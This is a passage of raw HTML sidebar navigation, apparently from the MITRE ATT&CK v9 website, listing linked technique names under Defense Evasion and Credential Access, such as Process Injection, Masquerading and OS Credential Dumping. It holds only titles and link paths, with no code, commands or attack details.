</a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1070"> <a href="/versions/v9/techniques/T1070/"> Indicator Removal on Host </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1070-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1070-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1070-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1070-body" aria-labelledby="enterprise-TA0005-T1070-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1070-T1070.001"> <a href="/versions/v9/techniques/T1070/001/"> Clear Windows Event Logs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1070-T1070.002"> <a href="/versions/v9/techniques/T1070/002/"> Clear Linux or Mac System Logs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1070-T1070.003"> <a href="/versions/v9/techniques/T1070/003/"> Clear Command History </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1070-T1070.004"> <a href="/versions/v9/techniques/T1070/004/"> File Deletion </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1070-T1070.005"> <a href="/versions/v9/techniques/T1070/005/"> Network Share Connection Removal </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1070-T1070.006"> <a href="/versions/v9/techniques/T1070/006/"> Timestomp </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1202"> <a href="/versions/v9/techniques/T1202/"> Indirect Command Execution </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1036"> <a href="/versions/v9/techniques/T1036/"> Masquerading </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1036-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1036-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1036-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1036-body" aria-labelledby="enterprise-TA0005-T1036-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1036-T1036.001"> <a href="/versions/v9/techniques/T1036/001/"> Invalid Code Signature </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1036-T1036.002"> <a href="/versions/v9/techniques/T1036/002/"> Right-to-Left Override </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1036-T1036.003"> <a href="/versions/v9/techniques/T1036/003/"> Rename System Utilities </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1036-T1036.004"> <a href="/versions/v9/techniques/T1036/004/"> Masquerade Task or Service </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1036-T1036.005"> <a href="/versions/v9/techniques/T1036/005/"> Match Legitimate Name or Location </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1036-T1036.006"> <a href="/versions/v9/techniques/T1036/006/"> Space after Filename </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1556"> <a href="/versions/v9/techniques/T1556/"> Modify Authentication Process </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1556-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1556-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1556-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1556-body" aria-labelledby="enterprise-TA0005-T1556-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1556-T1556.001"> <a href="/versions/v9/techniques/T1556/001/"> Domain Controller Authentication </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1556-T1556.002"> <a href="/versions/v9/techniques/T1556/002/"> Password Filter DLL </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1556-T1556.003"> <a href="/versions/v9/techniques/T1556/003/"> Pluggable Authentication Modules </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1556-T1556.004"> <a href="/versions/v9/techniques/T1556/004/"> Network Device Authentication </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1578"> <a href="/versions/v9/techniques/T1578/"> Modify Cloud Compute Infrastructure </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1578-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1578-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1578-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1578-body" aria-labelledby="enterprise-TA0005-T1578-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1578-T1578.001"> <a href="/versions/v9/techniques/T1578/001/"> Create Snapshot </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1578-T1578.002"> <a href="/versions/v9/techniques/T1578/002/"> Create Cloud Instance </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1578-T1578.003"> <a href="/versions/v9/techniques/T1578/003/"> Delete Cloud Instance </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1578-T1578.004"> <a href="/versions/v9/techniques/T1578/004/"> Revert Cloud Instance </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1112"> <a href="/versions/v9/techniques/T1112/"> Modify Registry </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1601"> <a href="/versions/v9/techniques/T1601/"> Modify System Image </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1601-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1601-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1601-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1601-body" aria-labelledby="enterprise-TA0005-T1601-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1601-T1601.001"> <a href="/versions/v9/techniques/T1601/001/"> Patch System Image </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1601-T1601.002"> <a href="/versions/v9/techniques/T1601/002/"> Downgrade System Image </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1599"> <a href="/versions/v9/techniques/T1599/"> Network Boundary Bridging </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1599-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1599-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1599-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1599-body" aria-labelledby="enterprise-TA0005-T1599-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1599-T1599.001"> <a href="/versions/v9/techniques/T1599/001/"> Network Address Translation Traversal </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1027"> <a href="/versions/v9/techniques/T1027/"> Obfuscated Files or Information </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1027-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1027-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1027-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1027-body" aria-labelledby="enterprise-TA0005-T1027-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1027-T1027.001"> <a href="/versions/v9/techniques/T1027/001/"> Binary Padding </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1027-T1027.002"> <a href="/versions/v9/techniques/T1027/002/"> Software Packing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1027-T1027.003"> <a href="/versions/v9/techniques/T1027/003/"> Steganography </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1027-T1027.004"> <a href="/versions/v9/techniques/T1027/004/"> Compile After Delivery </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1027-T1027.005"> <a href="/versions/v9/techniques/T1027/005/"> Indicator Removal from Tools </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1542"> <a href="/versions/v9/techniques/T1542/"> Pre-OS Boot </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1542-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1542-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1542-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1542-body" aria-labelledby="enterprise-TA0005-T1542-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1542-T1542.001"> <a href="/versions/v9/techniques/T1542/001/"> System Firmware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1542-T1542.002"> <a href="/versions/v9/techniques/T1542/002/"> Component Firmware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1542-T1542.003"> <a href="/versions/v9/techniques/T1542/003/"> Bootkit </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1542-T1542.004"> <a href="/versions/v9/techniques/T1542/004/"> ROMMONkit </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1542-T1542.005"> <a href="/versions/v9/techniques/T1542/005/"> TFTP Boot </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1055"> <a href="/versions/v9/techniques/T1055/"> Process Injection </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1055-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1055-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1055-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1055-body" aria-labelledby="enterprise-TA0005-T1055-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.001"> <a href="/versions/v9/techniques/T1055/001/"> Dynamic-link Library Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.002"> <a href="/versions/v9/techniques/T1055/002/"> Portable Executable Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.003"> <a href="/versions/v9/techniques/T1055/003/"> Thread Execution Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.004"> <a href="/versions/v9/techniques/T1055/004/"> Asynchronous Procedure Call </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.005"> <a href="/versions/v9/techniques/T1055/005/"> Thread Local Storage </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.008"> <a href="/versions/v9/techniques/T1055/008/"> Ptrace System Calls </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.009"> <a href="/versions/v9/techniques/T1055/009/"> Proc Memory </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.011"> <a href="/versions/v9/techniques/T1055/011/"> Extra Window Memory Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.012"> <a href="/versions/v9/techniques/T1055/012/"> Process Hollowing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.013"> <a href="/versions/v9/techniques/T1055/013/"> Process Doppelgänging </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1055-T1055.014"> <a href="/versions/v9/techniques/T1055/014/"> VDSO Hijacking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1207"> <a href="/versions/v9/techniques/T1207/"> Rogue Domain Controller </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1014"> <a href="/versions/v9/techniques/T1014/"> Rootkit </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1218"> <a href="/versions/v9/techniques/T1218/"> Signed Binary Proxy Execution </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1218-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1218-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1218-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1218-body" aria-labelledby="enterprise-TA0005-T1218-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.001"> <a href="/versions/v9/techniques/T1218/001/"> Compiled HTML File </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.002"> <a href="/versions/v9/techniques/T1218/002/"> Control Panel </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.003"> <a href="/versions/v9/techniques/T1218/003/"> CMSTP </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.004"> <a href="/versions/v9/techniques/T1218/004/"> InstallUtil </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.005"> <a href="/versions/v9/techniques/T1218/005/"> Mshta </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.007"> <a href="/versions/v9/techniques/T1218/007/"> Msiexec </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.008"> <a href="/versions/v9/techniques/T1218/008/"> Odbcconf </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.009"> <a href="/versions/v9/techniques/T1218/009/"> Regsvcs/Regasm </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.010"> <a href="/versions/v9/techniques/T1218/010/"> Regsvr32 </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.011"> <a href="/versions/v9/techniques/T1218/011/"> Rundll32 </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1218-T1218.012"> <a href="/versions/v9/techniques/T1218/012/"> Verclsid </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1216"> <a href="/versions/v9/techniques/T1216/"> Signed Script Proxy Execution </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1216-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1216-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1216-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1216-body" aria-labelledby="enterprise-TA0005-T1216-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1216-T1216.001"> <a href="/versions/v9/techniques/T1216/001/"> PubPrn </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1553"> <a href="/versions/v9/techniques/T1553/"> Subvert Trust Controls </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1553-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1553-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1553-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1553-body" aria-labelledby="enterprise-TA0005-T1553-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1553-T1553.001"> <a href="/versions/v9/techniques/T1553/001/"> Gatekeeper Bypass </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1553-T1553.002"> <a href="/versions/v9/techniques/T1553/002/"> Code Signing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1553-T1553.003"> <a href="/versions/v9/techniques/T1553/003/"> SIP and Trust Provider Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1553-T1553.004"> <a href="/versions/v9/techniques/T1553/004/"> Install Root Certificate </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1553-T1553.005"> <a href="/versions/v9/techniques/T1553/005/"> Mark-of-the-Web Bypass </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1553-T1553.006"> <a href="/versions/v9/techniques/T1553/006/"> Code Signing Policy Modification </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1221"> <a href="/versions/v9/techniques/T1221/"> Template Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1205"> <a href="/versions/v9/techniques/T1205/"> Traffic Signaling </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1205-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1205-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1205-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1205-body" aria-labelledby="enterprise-TA0005-T1205-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1205-T1205.001"> <a href="/versions/v9/techniques/T1205/001/"> Port Knocking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1127"> <a href="/versions/v9/techniques/T1127/"> Trusted Developer Utilities Proxy Execution </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1127-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1127-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1127-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1127-body" aria-labelledby="enterprise-TA0005-T1127-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1127-T1127.001"> <a href="/versions/v9/techniques/T1127/001/"> MSBuild </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1535"> <a href="/versions/v9/techniques/T1535/"> Unused/Unsupported Cloud Regions </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1550"> <a href="/versions/v9/techniques/T1550/"> Use Alternate Authentication Material </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1550-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1550-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1550-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1550-body" aria-labelledby="enterprise-TA0005-T1550-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1550-T1550.001"> <a href="/versions/v9/techniques/T1550/001/"> Application Access Token </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1550-T1550.002"> <a href="/versions/v9/techniques/T1550/002/"> Pass the Hash </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1550-T1550.003"> <a href="/versions/v9/techniques/T1550/003/"> Pass the Ticket </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1550-T1550.004"> <a href="/versions/v9/techniques/T1550/004/"> Web Session Cookie </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1078"> <a href="/versions/v9/techniques/T1078/"> Valid Accounts </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1078-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1078-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1078-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1078-body" aria-labelledby="enterprise-TA0005-T1078-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1078-T1078.001"> <a href="/versions/v9/techniques/T1078/001/"> Default Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1078-T1078.002"> <a href="/versions/v9/techniques/T1078/002/"> Domain Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1078-T1078.003"> <a href="/versions/v9/techniques/T1078/003/"> Local Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1078-T1078.004"> <a href="/versions/v9/techniques/T1078/004/"> Cloud Accounts </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1497"> <a href="/versions/v9/techniques/T1497/"> Virtualization/Sandbox Evasion </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1497-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1497-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1497-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1497-body" aria-labelledby="enterprise-TA0005-T1497-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1497-T1497.001"> <a href="/versions/v9/techniques/T1497/001/"> System Checks </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1497-T1497.002"> <a href="/versions/v9/techniques/T1497/002/"> User Activity Based Checks </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1497-T1497.003"> <a href="/versions/v9/techniques/T1497/003/"> Time Based Evasion </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0005-T1600"> <a href="/versions/v9/techniques/T1600/"> Weaken Encryption </a> <div class="expand-button collapsed" id="enterprise-TA0005-T1600-header" data-toggle="collapse" data-target="#enterprise-TA0005-T1600-body" aria-expanded="false" aria-controls="#enterprise-TA0005-T1600-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0005-T1600-body" aria-labelledby="enterprise-TA0005-T1600-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1600-T1600.001"> <a href="/versions/v9/techniques/T1600/001/"> Reduce Key Space </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1600-T1600.002"> <a href="/versions/v9/techniques/T1600/002/"> Disable Crypto Hardware </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0005-T1220"> <a href="/versions/v9/techniques/T1220/"> XSL Script Processing </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006"> <a href="/versions/v9/tactics/TA0006"> Credential Access </a> <div class="expand-button collapsed" id="enterprise-TA0006-header" data-toggle="collapse" data-target="#enterprise-TA0006-body" aria-expanded="false" aria-controls="#enterprise-TA0006-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-body" aria-labelledby="enterprise-TA0006-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1110"> <a href="/versions/v9/techniques/T1110/"> Brute Force </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1110-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1110-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1110-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1110-body" aria-labelledby="enterprise-TA0006-T1110-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1110-T1110.001"> <a href="/versions/v9/techniques/T1110/001/"> Password Guessing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1110-T1110.002"> <a href="/versions/v9/techniques/T1110/002/"> Password Cracking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1110-T1110.003"> <a href="/versions/v9/techniques/T1110/003/"> Password Spraying </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1110-T1110.004"> <a href="/versions/v9/techniques/T1110/004/"> Credential Stuffing </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1555"> <a href="/versions/v9/techniques/T1555/"> Credentials from Password Stores </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1555-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1555-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1555-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1555-body" aria-labelledby="enterprise-TA0006-T1555-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1555-T1555.001"> <a href="/versions/v9/techniques/T1555/001/"> Keychain </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1555-T1555.002"> <a href="/versions/v9/techniques/T1555/002/"> Securityd Memory </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1555-T1555.003"> <a href="/versions/v9/techniques/T1555/003/"> Credentials from Web Browsers </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1555-T1555.004"> <a href="/versions/v9/techniques/T1555/004/"> Windows Credential Manager </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1555-T1555.005"> <a href="/versions/v9/techniques/T1555/005/"> Password Managers </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1212"> <a href="/versions/v9/techniques/T1212/"> Exploitation for Credential Access </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1187"> <a href="/versions/v9/techniques/T1187/"> Forced Authentication </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1606"> <a href="/versions/v9/techniques/T1606/"> Forge Web Credentials </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1606-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1606-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1606-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1606-body" aria-labelledby="enterprise-TA0006-T1606-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1606-T1606.001"> <a href="/versions/v9/techniques/T1606/001/"> Web Cookies </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1606-T1606.002"> <a href="/versions/v9/techniques/T1606/002/"> SAML Tokens </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1056"> <a href="/versions/v9/techniques/T1056/"> Input Capture </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1056-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1056-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1056-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1056-body" aria-labelledby="enterprise-TA0006-T1056-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1056-T1056.001"> <a href="/versions/v9/techniques/T1056/001/"> Keylogging </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1056-T1056.002"> <a href="/versions/v9/techniques/T1056/002/"> GUI Input Capture </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1056-T1056.003"> <a href="/versions/v9/techniques/T1056/003/"> Web Portal Capture </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1056-T1056.004"> <a href="/versions/v9/techniques/T1056/004/"> Credential API Hooking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1557"> <a href="/versions/v9/techniques/T1557/"> Man-in-the-Middle </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1557-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1557-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1557-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1557-body" aria-labelledby="enterprise-TA0006-T1557-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1557-T1557.001"> <a href="/versions/v9/techniques/T1557/001/"> LLMNR/NBT-NS Poisoning and SMB Relay </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1557-T1557.002"> <a href="/versions/v9/techniques/T1557/002/"> ARP Cache Poisoning </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1556"> <a href="/versions/v9/techniques/T1556/"> Modify Authentication Process </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1556-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1556-body" aria-expanded="false" aria-controls="#enterprise-TA0006-T1556-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0006-T1556-body" aria-labelledby="enterprise-TA0006-T1556-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1556-T1556.001"> <a href="/versions/v9/techniques/T1556/001/"> Domain Controller Authentication </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1556-T1556.002"> <a href="/versions/v9/techniques/T1556/002/"> Password Filter DLL </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1556-T1556.003"> <a href="/versions/v9/techniques/T1556/003/"> Pluggable Authentication Modules </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1556-T1556.004"> <a href="/versions/v9/techniques/T1556/004/"> Network Device Authentication </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0006-T1040"> <a href="/versions/v9/techniques/T1040/"> Network Sniffing </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0006-T1003"> <a href="/versions/v9/techniques/T1003/"> OS Credential Dumping </a> <div class="expand-button collapsed" id="enterprise-TA0006-T1003-header" data-toggle="collapse" data-target="#enterprise-TA0006-T1003-body" aria-expanded="false" 